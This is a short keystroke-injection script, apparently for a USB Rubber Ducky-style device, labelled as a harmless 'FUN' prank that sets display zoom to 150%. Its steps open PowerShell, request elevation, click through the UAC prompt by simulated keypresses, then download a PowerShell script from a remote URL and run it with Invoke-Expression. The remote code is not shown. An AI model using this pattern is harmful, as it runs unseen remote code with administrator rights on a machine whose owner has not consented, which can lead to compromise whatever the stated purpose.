19 lines
414 B
Plaintext
19 lines
414 B
Plaintext
REM Author: UNC0V3R3D
|
|
REM Description: Uses the monitor DPI to change the zoom to 150%.
|
|
REM Version: 1.0
|
|
REM Category: FUN
|
|
DELAY 800
|
|
GUI r
|
|
DELAY 800
|
|
STRING powershell Start-Process powershell -Verb runAs
|
|
DELAY 800
|
|
ENTER
|
|
DELAY 800
|
|
LEFTARROW
|
|
DELAY 800
|
|
ENTER
|
|
DELAY 500
|
|
STRING Invoke-Expression (Invoke-WebRequest -Uri "https://raw.githubusercontent.com/UNC0V3R3D/resources/main/dpi_code.ps1").Content
|
|
DELAY 200
|
|
ENTER
|